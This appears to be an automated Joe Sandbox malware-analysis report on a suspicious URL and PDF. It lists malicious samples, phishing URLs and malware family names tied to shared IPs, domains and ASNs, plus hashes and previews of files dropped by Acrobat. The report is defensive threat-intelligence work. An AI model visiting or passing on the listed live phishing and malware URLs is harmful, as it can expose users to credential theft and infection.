URL: https://desbullariamos.sa.com Model: Joe Sandbox AI	{ "typosquatting": false, "unusual_query_string": false, "suspicious_tld": false, "ip_in_url": false, "long_subdomain": false, "malicious_keywords": false, "encoded_characters": false, "redirection": false, "contains_email_address": false, "known_domain": false, "brand_spoofing_attempt": false, "third_party_hosting": false }
URL: https://desbullariamos.sa.com
URL: https://desbullariamos.sa.com/Scanned.html Model: Joe Sandbox AI	{ "brands": "unknown" }

URL: PDF document Model: Joe Sandbox AI	{ "brands": "unknown" }

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
68.183.112.81	https://garfieldthecat.tech/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse
	MDtEXRDJ3N.html	Get hash	malicious	WinSearchAbuse	Browse
	OmUg4Vt9Cg.html	Get hash	malicious	WinSearchAbuse	Browse
	FEDEX234598765.html	Get hash	malicious	WinSearchAbuse	Browse
	https://listafrica.org/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse
	RUCkZvoDjG.htm	Get hash	malicious	WinSearchAbuse	Browse
	Belegdetails Nr378-938-027181-PDF.html	Get hash	malicious	WinSearchAbuse	Browse
	SFaLIQYuEV.htm	Get hash	malicious	WinSearchAbuse	Browse
	8xOax9866X.htm	Get hash	malicious	WinSearchAbuse	Browse
	uioLmjrj4F.htm	Get hash	malicious	WinSearchAbuse	Browse
239.255.255.250	INVOICE_2279_from_RealEyes Digital LLC (1).pdf	Get hash	malicious	Unknown	Browse
	2AIgdyA1Cl.exe	Get hash	malicious	Stealc, Vidar	Browse
	t3VyxF5MmA.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	KNkr78hyig.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	Pm81aa8zii.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	avBx6p1FAX.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	kGxQbLOG7s.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	q79Pocl81P.exe	Get hash	malicious	Cryptbot	Browse
	HHFgVU1HGu.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
	GxSEtDSBuK.exe	Get hash	malicious	Clipboard Hijacker, Cryptbot	Browse
172.93.120.113	DHL Package.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	monteveliz.cl/SjZVauFBbad87.bin

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
winaero.com	https://garfieldthecat.tech/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	MDtEXRDJ3N.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	OmUg4Vt9Cg.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	FEDEX234598765.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	https://listafrica.org/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	RUCkZvoDjG.htm	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	Belegdetails Nr378-938-027181-PDF.html	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	SFaLIQYuEV.htm	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	8xOax9866X.htm	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
	uioLmjrj4F.htm	Get hash	malicious	WinSearchAbuse	Browse	68.183.112.81
bg.microsoft.map.fastly.net	INVOICE_2279_from_RealEyes Digital LLC (1).pdf	Get hash	malicious	Unknown	Browse	199.232.214.172
	Z8oTIWCyDE.exe	Get hash	malicious	LummaC	Browse	199.232.210.172
	BB4S2ErvqK.exe	Get hash	malicious	LummaC	Browse	199.232.214.172
	MS100384UTC.xls	Get hash	malicious	Unknown	Browse	199.232.210.172
	SWIFT.xls	Get hash	malicious	Unknown	Browse	199.232.214.172
	tmp.zip	Get hash	malicious	Unknown	Browse	199.232.210.172
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, LummaC Stealer, PureLog Stealer, Stealc, zgRAT	Browse	199.232.210.172
	https://p.placed.com/api/v2/sync/impression?partner=barkley&plaid=0063o000014sWgoAAE&version=1.0&payload_campaign_identifier=71700000100870630&payload_timestamp=5943094174221506287&payload_type=impression&redirect=http%3A%2F%2Fgoogle.com%2Famp%2Fs%2Fgoal.com.co%2Fwp%2Fpayment	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	Dec 2024_12192924_Image.pdf	Get hash	malicious	HTMLPhisher	Browse	199.232.214.172
	invoice.docm	Get hash	malicious	Unknown	Browse	199.232.214.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
HOST4GEEKS-LLCUS	https://garfieldthecat.tech/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	172.93.120.103
	https://www.google.com.hk/url?q=KWUZMS42J831JSWOSF4KEIP36T3IE7YuQiApLjODz3yh4nNeW8uuQi&rct=XS%25RANDOM4%25wDnNeW8yycT&sa=t&esrc=nNeW8F%25RANDOM3%25A0xys8Em2FL&source=&cd=tS6T8%25RANDOM3%25Tiw9XH&cad=XpPkDfJX%25RANDOM4%25VS0Y&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp%2Fasubiad.online/grieksm/366a15ae094dd43620eb959537cb323e8fcdb76b/bWZpbm5lZ2FuQHVzY2hhbWJlci5jb20=	Get hash	malicious	Unknown	Browse	185.221.216.117
	https://listafrica.org/Receipt.html	Get hash	malicious	WinSearchAbuse	Browse	172.93.120.138
	https://stoorm5.activehosted.com/content/PNNm1e/2024/11/29/296d9a00-ab7c-413b-8445-d50603229893.pdf	Get hash	malicious	HTMLPhisher	Browse	185.221.216.128
	https://linktr.ee/priyanka662	Get hash	malicious	Gabagool	Browse	172.93.120.138
	Readouts.bat.exe	Get hash	malicious	GuLoader	Browse	172.93.121.126
	Readouts.bat.exe	Get hash	malicious	GuLoader	Browse	172.93.121.126
	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	185.221.216.102
	https://voyages-moinschers.fr/request/index.html?userid=viviane.beigbeder@idcom-france.com	Get hash	malicious	Unknown	Browse	185.221.216.102
	https://mkwomens.com/iuefoiuherjhkjf/iuyrijkfjkoifjoijreiwiw/e9c4710345f07b1cf048900d092f8cdc/YW5nZWxhLnN1bW1lcnNieUBhc2h1cnN0LmNvbQ==	Get hash	malicious	Unknown	Browse	172.93.120.13
DIGITALOCEAN-ASNUS	DpEHzbOOoB.exe	Get hash	malicious	AsyncRAT	Browse	104.236.39.42
	http://email.mg.mylearninghub.com/c/eJyUzr9OxCAcAOCngc2Gf6UwMBjPeiZ3i4nJeRuF3vWXUlBKz9anNw5OTu7f8HlDnacU94Y2XEhKJFF4MPqinXaO1KLXyhHbKKuJrLUinXVKKgyGESYoo5oyKkVT-UbwWrva876RjikkyHStpi30NkeI12HpKpcmHMxQyvuM-D1iLWKt70Oxv-ivR6y1SxkQay-Q53JIV4htCiF9HiCOiLcu-f4hxQvkCfHdG23G7vixvj4v9XY80ePTeHoJqzz79XGvzivZf51P4w0Qk-AR30muFM7GbnHJVWfzCBEJ4i2AG-ButnHc0k-jKhmX_83xzbDvAAAA__-qL3Ha	Get hash	malicious	Unknown	Browse	142.93.172.25
	nshmpsl.elf	Get hash	malicious	Mirai	Browse	46.101.242.244
	https://www.tblgroup.com/tbl2/certificados-digitales/	Get hash	malicious	CAPTCHA Scam ClickFix	Browse	178.128.225.126
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, zgRAT	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, Cryptbot, LummaC Stealer	Browse	178.62.201.34
	8ZVMneG.exe	Get hash	malicious	LummaC	Browse	178.62.201.34
	file.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer	Browse	104.131.68.180
	file.exe	Get hash	malicious	NetSupport RAT, LummaC, Amadey, Blank Grabber, LummaC Stealer, PureLog Stealer	Browse	178.62.201.34
	ir_agent.exe	Get hash	malicious	Metasploit	Browse	157.230.10.115

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.099653670532875
Encrypted:	false
SSDEEP:	6:aXNq2P92nKuAl9OmbnIFUt8ncyZmw+nc+kwO92nKuAl9OmbjLJ:Iv4HAahFUt8cy/+c+5LHAaSJ
MD5:	E20A8566784E1BBE74ADCEE6F45150FC
SHA1:	10ABDC7E16018B340F301501F116ECF03EE4B20C
SHA-256:	B0ABE6099F9F8CCE08CB21F588C3FBFDD8EE1492F2A1B034BE575B7CE6C1C74B
SHA-512:	3E1FAB26D1A0F351812B648C49AA4158FFD8CBE06C603061425F8941126C36BF61D06F477C6CA305628E47C4537036D3124299769D154ACCD35AE90A6966103D
Malicious:	false
Reputation:	low
Preview:	2024/12/20-12:11:04.289 9a0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/20-12:11:04.291 9a0 Recovering log #3.2024/12/20-12:11:04.291 9a0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	291
Entropy (8bit):	5.099653670532875
Encrypted:	false
SSDEEP:	6:aXNq2P92nKuAl9OmbnIFUt8ncyZmw+nc+kwO92nKuAl9OmbjLJ:Iv4HAahFUt8cy/+c+5LHAaSJ
MD5:	E20A8566784E1BBE74ADCEE6F45150FC
SHA1:	10ABDC7E16018B340F301501F116ECF03EE4B20C
SHA-256:	B0ABE6099F9F8CCE08CB21F588C3FBFDD8EE1492F2A1B034BE575B7CE6C1C74B
SHA-512:	3E1FAB26D1A0F351812B648C49AA4158FFD8CBE06C603061425F8941126C36BF61D06F477C6CA305628E47C4537036D3124299769D154ACCD35AE90A6966103D
Malicious:	false
Reputation:	low
Preview:	2024/12/20-12:11:04.289 9a0 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/20-12:11:04.291 9a0 Recovering log #3.2024/12/20-12:11:04.291 9a0 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.154935697982236
Encrypted:	false
SSDEEP:	6:Sq2P92nKuAl9Ombzo2jMGIFUt8dxZmw+iDkwO92nKuAl9Ombzo2jMmLJ:Sv4HAa8uFUt8dx/+iD5LHAa8RJ
MD5:	978EAB21448E9B3E7E1AAD3EECC82F5C
SHA1:	7BC20C9549753D3B14FE59AEE7F708B27010AA66
SHA-256:	27FDA83960EA8C03E4F6419BAA40C891DD4EA7422B4998EACE4710A446E558E2
SHA-512:	9CF8FEF3DFA8A80DCDF639F7498EA5144D7306DCBA8570414B48A92436C24D55B265F3489EA8416F642FE5F4614730AA3B21C55B587291441DEB974AC5F1402F
Malicious:	false
Reputation:	low
Preview:	2024/12/20-12:11:04.359 994 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/20-12:11:04.361 994 Recovering log #3.2024/12/20-12:11:04.362 994 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	335
Entropy (8bit):	5.154935697982236
Encrypted:	false
SSDEEP:	6:Sq2P92nKuAl9Ombzo2jMGIFUt8dxZmw+iDkwO92nKuAl9Ombzo2jMmLJ:Sv4HAa8uFUt8dx/+iD5LHAa8RJ
MD5:	978EAB21448E9B3E7E1AAD3EECC82F5C
SHA1:	7BC20C9549753D3B14FE59AEE7F708B27010AA66
SHA-256:	27FDA83960EA8C03E4F6419BAA40C891DD4EA7422B4998EACE4710A446E558E2
SHA-512:	9CF8FEF3DFA8A80DCDF639F7498EA5144D7306DCBA8570414B48A92436C24D55B265F3489EA8416F642FE5F4614730AA3B21C55B587291441DEB974AC5F1402F
Malicious:	false
Reputation:	low
Preview:	2024/12/20-12:11:04.359 994 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/20-12:11:04.361 994 Recovering log #3.2024/12/20-12:11:04.362 994 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\Network Persistent State~RF5bbdf6.TMP (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\bbe9cbdb-e3d7-45a6-8d74-47913d56749b.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	modified
Size (bytes):	508
Entropy (8bit):	5.061602859316414
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqmysBdOg2H9LZcaq3QYiubxnP7E4TfF+:Y2sRdsZdMH1g3QYhbxP7np+
MD5:	6F60B8CDD5BD97B6EE8361EBAE31D30B
SHA1:	619D19B45A75EC678AFCF9F097183E410999556A
SHA-256:	90A1EA9B24471FF01EA2F38B1794E9DDF3FD0618BDB19F9A3FEE68F5F847F5EC
SHA-512:	45335DC96DC18754846F44EF848C99E16C9B390829FA70D5B0C9AC5845C35E5E157E4BD84A498FF2E896D9C9340F7B56C9B38030839E7367D7C8CD50A8396645
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379274676701039","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":639711},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Network\e129a911-5eb4-4abe-8b84-39c06404a828.tmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	508
Entropy (8bit):	5.047195090775108
Encrypted:	false
SSDEEP:	12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
MD5:	70321A46A77A3C2465E2F031754B3E06
SHA1:	5E7E713285D36F12ACFC68A34D8A34FD33C96B34
SHA-256:	344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
SHA-512:	E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\000003.log

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	4509
Entropy (8bit):	5.2314018402128575
Encrypted:	false
SSDEEP:	96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUtrDNnVFZ:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLU
MD5:	F8B804451B0157999CC36591832EC967
SHA1:	4253C473A3F717EB5A53A4E26934713CF1116129
SHA-256:	6F9578EF6F336291084E7204A41DBF85BC73E7CC95EA44ED7F4DA58A0C8F4714
SHA-512:	B1317DF573AAEA68142626DA97220E0217B2348124171C2F3E71CFF73C9E0F582C4BB23F4A1CC72308951C64F0842ACC57D0A07E3499EE4CB0D06CC77DCF966F
Malicious:	false
Preview:	*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.\|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.157559155202654
Encrypted:	false
SSDEEP:	6:ZJcgOq2P92nKuAl9OmbzNMxIFUt8m3JZmw+uDkwO92nKuAl9OmbzNMFLJ:ZSgOv4HAa8jFUt8AJ/+uD5LHAa84J
MD5:	953DEE46FABFDD86FF76ED63136A72D4
SHA1:	01E9AAEDBE33DF53CE21891180A3762F489CEB3D
SHA-256:	F1D81BF59DE3B41DAFAB0CA79E7527C5256B2264C07FF62ADE76BD74341352E5
SHA-512:	18EF7839CD70D850669EA45EE08392B2C94EBD6877C54C376A57303F6D50431DBF8A92F7D05C28CE5606272F5BA09C1FC38A9329E962F1F58F13E58AAF08991D
Malicious:	false
Preview:	2024/12/20-12:11:05.066 994 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/20-12:11:05.310 994 Recovering log #3.2024/12/20-12:11:05.312 994 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	323
Entropy (8bit):	5.157559155202654
Encrypted:	false
SSDEEP:	6:ZJcgOq2P92nKuAl9OmbzNMxIFUt8m3JZmw+uDkwO92nKuAl9OmbzNMFLJ:ZSgOv4HAa8jFUt8AJ/+uD5LHAa84J
MD5:	953DEE46FABFDD86FF76ED63136A72D4
SHA1:	01E9AAEDBE33DF53CE21891180A3762F489CEB3D
SHA-256:	F1D81BF59DE3B41DAFAB0CA79E7527C5256B2264C07FF62ADE76BD74341352E5
SHA-512:	18EF7839CD70D850669EA45EE08392B2C94EBD6877C54C376A57303F6D50431DBF8A92F7D05C28CE5606272F5BA09C1FC38A9329E962F1F58F13E58AAF08991D
Malicious:	false
Preview:	2024/12/20-12:11:05.066 994 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/20-12:11:05.310 994 Recovering log #3.2024/12/20-12:11:05.312 994 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .

C:\Users\user\AppData\LocalLow\Adobe\Acrobat\DC\ConnectorIcons\icon-241220171108Z-166.bmp

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
File Type:	PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
Category:	dropped
Size (bytes):	71190
Entropy (8bit):	1.9518461758293009
Encrypted:	false
SSDEEP:	384:Q3fWIHfb7eY7R1z9l55nA37LZ4RD15/u0YCeEwwJ:Q31DqY7tT5sLZ2u0YNTwJ
MD5:	3ED6C3CDEC65D551BAB52DF1FB09315A
SHA1:	DC6BE436B3E46AA520CFA090BA24B34CBBF71D1E
SHA-256:	4BB84F786AAEEE0A73B0A228F181C536CB0D44A1D8BD4A4B371EE3D6F8378105
SHA-512:	FC598FEA2B6DEE207A53A06799B6A682FBFC75BCBC8F2FEC434B0E50A969627C0F6475F7458441CA4EA3D00D1B6BB45840A0F77E03188C3F514CF2B17450C1E9
Malicious:	false
Preview:	BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Certificate, Version=3
Category:	dropped
Size (bytes):	1391
Entropy (8bit):	7.705940075877404
Encrypted:	false
SSDEEP:	24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
MD5:	0CD2F9E0DA1773E9ED864DA5E370E74E
SHA1:	CABD2A79A1076A31F21D253635CB039D4329A5E8
SHA-256:	96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
SHA-512:	3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
Malicious:	false
Preview:	0..k0..S............@.YDc.c...0....H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0....H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.\|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I......A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.\|C.t..t.....0.[q6....00\H..;..}`...).........A.......\|.;F.H..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..\|o..;.....'...}~.."......

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2D85F72862B55C4EADD9E66E06947F3D

Download File

Process:	C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
File Type:	data
Category:	dropped
Size (bytes):	192
